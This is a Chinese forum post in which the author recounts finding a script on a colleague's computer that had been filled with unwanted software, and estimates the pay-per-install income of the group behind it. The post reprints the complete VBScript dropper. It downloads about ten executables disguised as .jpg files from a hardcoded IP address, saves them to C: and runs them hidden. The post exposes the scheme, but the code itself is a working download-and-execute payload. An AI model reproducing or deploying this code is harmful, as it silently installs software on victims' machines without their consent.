分享一个截获到的月入百万病毒营销团伙的代码

事情要从办公室一同事的机子说起。。
某天发现电脑无缘无故被安装了N多垃圾软件，帮他检查发现C盘多了这么多东西。。
<ignore_js_op> 
而且还有一个可疑的文件
<ignore_js_op> 
打开之后发现如下代码：

本帖隐藏的内容

on error resume next
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
iUser=LCase(Wscript.Arguments(2))
iPass=LCase(Wscript.Arguments(3))
set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP")
if iUser="" and iPass="" then
xPost.Open "GET","http://115.47.57.43:2015/bd.jpg",0  '目测这个是恶意软件的服务器地址，服务器上的文件名是jpg格式
else
xPost.Open "GET",iRemote,0,iUser,iPass
end if
xPost.Send()
set sGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile "C:\Baidusd_OnlineSetup_sid_30084_silent.exe",2  '下载文件时顺便改成exe格式
Wscript.Sleep 3000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "C:\Baidusd_OnlineSetup_sid_30084_silent.exe", 0   '运行安装
Wscript.Sleep 1000
on error resume next
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
iUser=LCase(Wscript.Arguments(2))
iPass=LCase(Wscript.Arguments(3))
set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP")
if iUser="" and iPass="" then
xPost.Open "GET","http://115.47.57.43:2015/lf.jpg",0   '继续重复上面的操作,下载另一个垃圾软件
else
xPost.Open "GET",iRemote,0,iUser,iPass
end if
xPost.Send()
set sGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile "C:\21230_lf.exe",2
Wscript.Sleep 3000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "C:\21230_lf.exe", 0
Wscript.Sleep 1000
on error resume next
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
iUser=LCase(Wscript.Arguments(2))
iPass=LCase(Wscript.Arguments(3))
set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP")
if iUser="" and iPass="" then
xPost.Open "GET","http://115.47.57.43:2015/wj.jpg",0
else
xPost.Open "GET",iRemote,0,iUser,iPass
end if
xPost.Send()
set sGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile "C:\setup_open_3354.exe",2
Wscript.Sleep 3000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "C:\setup_open_3354.exe", 0
Wscript.Sleep 1000
on error resume next
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
iUser=LCase(Wscript.Arguments(2))
iPass=LCase(Wscript.Arguments(3))
set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP")
if iUser="" and iPass="" then
xPost.Open "GET","http://115.47.57.43:2015/db.jpg",0
else
xPost.Open "GET",iRemote,0,iUser,iPass
end if
xPost.Send()
set sGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile "C:\KINSTALLERS_74_2370.exe",2
Wscript.Sleep 3000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "C:\KINSTALLERS_74_2370.exe", 0
Wscript.Sleep 1000
on error resume next
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
iUser=LCase(Wscript.Arguments(2))
iPass=LCase(Wscript.Arguments(3))
set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP")
if iUser="" and iPass="" then
xPost.Open "GET","http://115.47.57.43:2015/pp.jpg",0
else
xPost.Open "GET",iRemote,0,iUser,iPass
end if
xPost.Send()
set sGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile "C:\paopao_20.exe",2
Wscript.Sleep 3000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "C:\paopao_20.exe", 0
Wscript.Sleep 1000
on error resume next
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
iUser=LCase(Wscript.Arguments(2))
iPass=LCase(Wscript.Arguments(3))
set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP")
if iUser="" and iPass="" then
xPost.Open "GET","http://115.47.57.43:2015/FX.jpg",0
else
xPost.Open "GET",iRemote,0,iUser,iPass
end if
xPost.Send()
set sGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile "C:\FunshionInstall_C170827.exe",2
Wscript.Sleep 3000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "C:\FunshionInstall_C170827.exe", 0
Wscript.Sleep 1000
on error resume next
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
iUser=LCase(Wscript.Arguments(2))
iPass=LCase(Wscript.Arguments(3))
set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP")
if iUser="" and iPass="" then
xPost.Open "GET","http://115.47.57.43:2015/wj.jpg",0
else
xPost.Open "GET",iRemote,0,iUser,iPass
end if
xPost.Send()
set sGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile "C:\setup_open_3333.exe",2
Wscript.Sleep 3000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "C:\setup_open_3333.exe", 0
Wscript.Sleep 1000
on error resume next
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
iUser=LCase(Wscript.Arguments(2))
iPass=LCase(Wscript.Arguments(3))
set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP")
if iUser="" and iPass="" then
xPost.Open "GET","http://115.47.57.43:2015/db.jpg",0
else
xPost.Open "GET",iRemote,0,iUser,iPass
end if
xPost.Send()
set sGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile "C:\KINSTALLERS_74_2366.exe",2
Wscript.Sleep 3000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "C:\KINSTALLERS_74_2366.exe", 0
Wscript.Sleep 1000
on error resume next
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
iUser=LCase(Wscript.Arguments(2))
iPass=LCase(Wscript.Arguments(3))
set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP")
if iUser="" and iPass="" then
xPost.Open "GET","http://115.47.57.43:2015/pp.jpg",0
else
xPost.Open "GET",iRemote,0,iUser,iPass
end if
xPost.Send()
set sGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile "C:\paopao_19.exe",2
Wscript.Sleep 3000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "C:\paopao_19.exe", 0
Wscript.Sleep 1000
on error resume next
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
iUser=LCase(Wscript.Arguments(2))
iPass=LCase(Wscript.Arguments(3))
set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP")
if iUser="" and iPass="" then
xPost.Open "GET","http://115.47.57.43:2015/db.jpg",0
else
xPost.Open "GET",iRemote,0,iUser,iPass
end if
xPost.Send()
set sGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile "C:\KINSTALLERS_74_2492.exe",2
Wscript.Sleep 3000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "C:\KINSTALLERS_74_2492.exe", 0
Wscript.Sleep 1000

 

 

 

从上面的下载的软件看,基本上推广的都是安全软件跟多媒体类.一般杀软都不会查杀。所以成功率还是挺高的

上去他们的服务器看了下
<ignore_js_op> 
看看他们的下载量,粗略的计算下
下载量约为19万次,按照每个软件5元计算,最早的文件是22号上传的.到现在不到一个月.直接收入接近100万!可见病毒营销是有多牛

 

 

 

G

M

T

 

检测语言 世界语 中文简体 中文繁体 丹麦语 乌克兰语 乌兹别克语 乌尔都语 亚美尼亚语 伊博语 俄语 保加利亚语 信德语 修纳语 僧伽罗语 克罗地亚语 冰岛语 加利西亚语 加泰罗尼亚语 匈牙利语 南非祖鲁语 卡纳达语 卢森堡语 印地语 印尼巽他语 印尼爪哇语 印尼语 古吉拉特语 吉尔吉斯语 哈萨克语 土耳其语 塔吉克语 塞尔维亚语 塞索托语 夏威夷语 威尔士语 孟加拉语 宿务语 尼泊尔语 巴斯克语 布尔语(南非荷兰语) 希伯来语 希腊语 库尔德语 弗里西语 德语 意大利语 意第绪语 拉丁语 拉脱维亚语 挪威语 捷克语 斯洛伐克语 斯洛文尼亚语 斯瓦希里语 旁遮普语 日语 普什图语 格鲁吉亚语 毛利语 法语 波兰语 波斯尼亚语 波斯语 泰卢固语 泰米尔语 泰语 海地克里奥尔语 爱尔兰语 爱沙尼亚语 瑞典语 白俄罗斯语 科萨 科西嘉语 立陶宛语 索马里语 约鲁巴语 缅甸语 罗马尼亚语 老挝语 芬兰语 苏格兰盖尔语 苗语 英语 荷兰语 菲律宾语 萨摩亚语 葡萄牙语 蒙古语 西班牙语 豪萨语 越南语 阿塞拜疆语 阿姆哈拉语 阿尔巴尼亚语 阿拉伯语 韩语 马其顿语 马尔加什语 马拉地语 马拉雅拉姆语 马来语 马耳他语 高棉语 齐切瓦语

世界语 中文简体 中文繁体 丹麦语 乌克兰语 乌兹别克语 乌尔都语 亚美尼亚语 伊博语 俄语 保加利亚语 信德语 修纳语 僧伽罗语 克罗地亚语 冰岛语 加利西亚语 加泰罗尼亚语 匈牙利语 南非祖鲁语 卡纳达语 卢森堡语 印地语 印尼巽他语 印尼爪哇语 印尼语 古吉拉特语 吉尔吉斯语 哈萨克语 土耳其语 塔吉克语 塞尔维亚语 塞索托语 夏威夷语 威尔士语 孟加拉语 宿务语 尼泊尔语 巴斯克语 布尔语(南非荷兰语) 希伯来语 希腊语 库尔德语 弗里西语 德语 意大利语 意第绪语 拉丁语 拉脱维亚语 挪威语 捷克语 斯洛伐克语 斯洛文尼亚语 斯瓦希里语 旁遮普语 日语 普什图语 格鲁吉亚语 毛利语 法语 波兰语 波斯尼亚语 波斯语 泰卢固语 泰米尔语 泰语 海地克里奥尔语 爱尔兰语 爱沙尼亚语 瑞典语 白俄罗斯语 科萨 科西嘉语 立陶宛语 索马里语 约鲁巴语 缅甸语 罗马尼亚语 老挝语 芬兰语 苏格兰盖尔语 苗语 英语 荷兰语 菲律宾语 萨摩亚语 葡萄牙语 蒙古语 西班牙语 豪萨语 越南语 阿塞拜疆语 阿姆哈拉语 阿尔巴尼亚语 阿拉伯语 韩语 马其顿语 马尔加什语 马拉地语 马拉雅拉姆语 马来语 马耳他语 高棉语 齐切瓦语

 

 

 

文本转语音功能仅限200个字符

 

选项 : 历史 : 反馈 : Donate

关闭

T